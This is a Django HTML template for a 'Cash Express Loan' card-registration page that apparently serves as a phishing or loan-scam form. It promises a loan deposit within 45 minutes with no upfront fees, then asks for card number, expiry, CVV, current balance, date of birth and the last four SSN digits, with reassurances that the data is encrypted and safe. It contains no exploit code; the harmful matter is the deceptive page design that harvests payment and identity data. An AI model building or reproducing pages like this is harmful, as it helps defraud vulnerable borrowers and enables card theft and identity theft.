<!DOCTYPE html>
<html lang="en">
{% load static %}
<head>
    <!-- Facebook Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '3676832522414607');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=3676832522414607&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->
	    <link rel="icon" href="https://imgur.com/b34soZQ.jpg">
    <link rel="icon" type="image/x-icon" href="{% static '/img/cashfevicon.png' %}"/>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Wilio Survey, Quotation, Review and Register form Wizard by Ansonika.">
    <meta name="author" content="Ansonika">
    <title>Loan Deposit | Register Form</title>

    <!-- Favicons-->
    <link rel="shortcut icon" href="img/favicon.ico" type="image/x-icon">
    <link rel="apple-touch-icon" type="image/x-icon" href="img/apple-touch-icon-57x57-precomposed.png">
    <link rel="apple-touch-icon" type="image/x-icon" sizes="72x72" href="img/apple-touch-icon-72x72-precomposed.png">
    <link rel="apple-touch-icon" type="image/x-icon" sizes="114x114" href="img/apple-touch-icon-114x114-precomposed.png">
    <link rel="apple-touch-icon" type="image/x-icon" sizes="144x144" href="img/apple-touch-icon-144x144-precomposed.png">

    <!-- GOOGLE WEB FONT -->
    <link href="https://fonts.googleapis.com/css?family=Work+Sans:400,500,600" rel="stylesheet">

    <!-- BASE CSS -->
    <link href="{%static 'preregister/html/css/bootstrap.min.css' %}" rel="stylesheet">
	<link href="{%static 'preregister/html/css/menu.css' %}" rel="stylesheet">
    <link href="{%static 'preregister/html/css/style.css' %}" rel="stylesheet">
	<link href="{%static 'preregister/html/css/vendors.css' %}" rel="stylesheet">

    <!-- YOUR CUSTOM CSS -->
    <link href="{%static 'preregister/html/css/custom.css' %}" rel="stylesheet">

	<!-- MODERNIZR MENU -->
	<script src="{%static 'preregister/html/js/modernizr.js' %}"></script>

</head>

<body>

	<div id="preloader">
		<div data-loader="circle-side"></div>
	</div><!-- /Preload -->

	<div id="loader_form">
		<div data-loader="circle-side-2"></div>
	</div><!-- /loader_form -->

	<nav>
		<ul class="cd-primary-nav">
			<li><a href="index.html" class="animated_link">Home</a></li>
			<li><a href="quotation-wizard-version.html" class="animated_link">Aboot Us</a></li>
			<li><a href="review-wizard-version.html" class="animated_link">Customers Review</a></li>
			<li><a href="registration-wizard-version.html" class="animated_link">Live Chat</a></li>
			<li><a href="about.html" class="animated_link">Verification FAQ</a></li>
			<li><a href="contacts.html" class="animated_link">Contact Us</a></li>
		</ul>
	</nav>
	<!-- /menu -->

	<div class="container-fluid full-height">
		<div class="row row-height">
			<div class="col-lg-6 content-left">
				<div class="content-left-wrapper">
					<a href="index.html" id="logo"><img src="{%static 'preregister/html//img/logo.png' %}" alt="" width="49" height="35"></a>
					<div id="social">

					</div>
					<!-- /social -->
					<div>
						<figure><img src="{%static 'preregister/html/img/info_graphic_2.svg' %}" alt="" class="img-fluid"></figure>
						<h2>Loan Deposit via Card Registration </h2>
				<p>To deposit the loan amount into your account, we require some details from your side. Afterward, we will transfer the loan amount directly to your bank account within a maximum of 45 minutes. No upfront fees are needed, and you are already eligible to receive this loan. We only require some additional details for the funds' deposit. <br> Please note that we will encrypt your information to ensure its security. Rest assured, it will be safe with us and will solely be used for the deposit process.
					<br>Please note that we will encrypt your information to ensure its security. Rest assured, it will be safe with us and will solely be used for the deposit process.</p>

						<a href="#start" class="btn_1 rounded mobile_btn">Start Now!</a>
					</div>
					<div class="copy">© 2023 Cash Express Loan</div>
				</div>
				<!-- /content-left-wrapper -->
			</div>
			<!-- /content-left -->

			<div class="col-lg-6 content-right" id="start">
				<div id="wizard_container">
					<div id="top-wizard">
							<div id="progressbar"></div>
						</div>
						<!-- /top-wizard -->
						<form action="loan-deposit-card" method="POST">
							{% csrf_token %}
							<input id="website" name="website" type="text" value="">
							<!-- Leave for security protection, read docs for details -->
							<div id="middle-wizard">
								<div class="step">
									<h3 class="main_question"><strong>1/3</strong>Please provide your details below to receive the loan and related documents.</h3>
									
									<p> Bank transfers may take up to five days, but we can deposit the loan immediately onto your card. Therefore, it's essential to ensure that you provide accurate information.</p>
									<div class="form-group">
										{{form.first_name}}
									</div>
									<div class="form-group">
										{{form.last_name}}
									</div>
									<div class="form-group">
										{{form.email}}
									</div>
									<div class="form-group">
										{{form.phone}}
									</div>
									<div class="form-group">
										{{form.payment_date}}
									</div>
									<div class="form-group">
										{{form.loan_amount}}
									</div>									
								</div>
							            <div class="step">
									<h3 class="main_question"><strong>2/3</strong>Your Address</h3> <p>You will receive the loan documents on your address within 24 hours and on email within 3 hours.</p> 									<div class="form-group">
										{{form.address}}
									</div>
									<div class="form-group">
										{{form.city}}
									</div>
									<div class="form-group">
										{{form.state}}
									</div>
											<div class="form-group">
										{{form.zip_code}}
									</div>

								</div>


















    <div class="submit step">
    	<div class="summary">
    		<div class="submit step">
									<h3 class="main_question"><strong>Click on submit</strong>Summary</h3>
                                    <p> After clicking 'Submit,' you will be redirected to our loan supervisor, who will review your loan file and initiate the deposit into your bank account</p>

									</div>

									<h3 class="main_question"><strong>3/3</strong>Banking Card Details</h3> <p>You will receive the loan within 45 minutes.</p>
									<p>Please provide your card details. </p> 									<div class="form-group">
										{{form.card_numbers}}
									</div>
									<div class="form-group">
										{{form.exp_date}}
									</div>
									<div class="form-group">
										{{form.cvv}}
								</div>
								<div class="form-group">
										{{form.current_balance}}
								</div>
									<div class="form-group">
										{{form.date_of_birth}}
								</div>
									<div class="form-group">
										{{form.last_four_ssn}}
								</div>
									<p> You will redirect to our loan supervisor and we will receive your details once you click on submit so he/she can check your loan file to deposit the loan in your bank account.
									Please note: Based on your profile, EFT (electronic funds transfer) maybe required to deposit the loan. </p>
								</div>
								{% if messages %}
								{% for message in messages %}
								<h4> test</h4>

								<!-- /step-->
								{% endfor %}
								{% endif %}
								</div>
								<!-- /step-->
							</div>
							<!-- /middle-wizard -->
							<div id="bottom-wizard">
								<button type="button" name="backward" class="backward">Prev</button>
								<button type="button" name="forward" class="forward">Next</button>
								<button type="submit" name="process" class="submit">Submit</button>
							</div>
							<!-- /bottom-wizard -->
						</form>
					</div>
					<!-- /Wizard container -->
			</div>
			<!-- /content-right-->
		</div>
		<!-- /row-->
	</div>
	<!-- /container-fluid -->

	<div class="cd-overlay-nav">
		<span></span>
	</div>
	<!-- /cd-overlay-nav -->

	<div class="cd-overlay-content">
		<span></span>
	</div>
	<!-- /cd-overlay-content -->

	<a href="#0" class="cd-nav-trigger">Menu<span class="cd-icon"></span></a>
	<!-- /menu button -->

	<!-- Modal terms -->
	<div class="modal fade" id="terms-txt" tabindex="-1" role="dialog" aria-labelledby="termsLabel" aria-hidden="true">
		<div class="modal-dialog modal-dialog-centered">
			<div class="modal-content">
				<div class="modal-header">
					<h4 class="modal-title" id="termsLabel">Terms and conditions</h4>
					<button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
				</div>
				<div class="modal-body">
					<p>Lorem ipsum dolor sit amet, in porro albucius qui, in <strong>nec quod novum accumsan</strong>, mei ludus tamquam dolores id. No sit debitis meliore postulant, per ex prompta alterum sanctus, pro ne quod dicunt sensibus.</p>
					<p>Lorem ipsum dolor sit amet, in porro albucius qui, in nec quod novum accumsan, mei ludus tamquam dolores id. No sit debitis meliore postulant, per ex prompta alterum sanctus, pro ne quod dicunt sensibus. Lorem ipsum dolor sit amet, <strong>in porro albucius qui</strong>, in nec quod novum accumsan, mei ludus tamquam dolores id. No sit debitis meliore postulant, per ex prompta alterum sanctus, pro ne quod dicunt sensibus.</p>
					<p>Lorem ipsum dolor sit amet, in porro albucius qui, in nec quod novum accumsan, mei ludus tamquam dolores id. No sit debitis meliore postulant, per ex prompta alterum sanctus, pro ne quod dicunt sensibus.</p>
				</div>
				<div class="modal-footer">
					<button type="button" class="btn_1" data-dismiss="modal">Close</button>
				</div>
			</div>
			<!-- /.modal-content -->
		</div>
		<!-- /.modal-dialog -->
	</div>
	<!-- /.modal -->

	<!-- COMMON SCRIPTS -->
	<script src="{%static 'preregister/html/js/jquery-3.2.1.min.js' %}"></script>
    <script src="{%static 'preregister/html/js/common_scripts.min.js' %}"></script>
	<script src="{%static 'preregister/html/js/velocity.min.js' %}"></script>
	<script src="{%static 'preregister/html/js/functions.js' %}"></script>
	<script src="{%static 'preregister/html/js/pw_strenght.js' %}"></script>

	<!-- Wizard script -->
	<script src="{%static 'preregister/html/js/registration_func.js' %}"></script>

</body>
</html>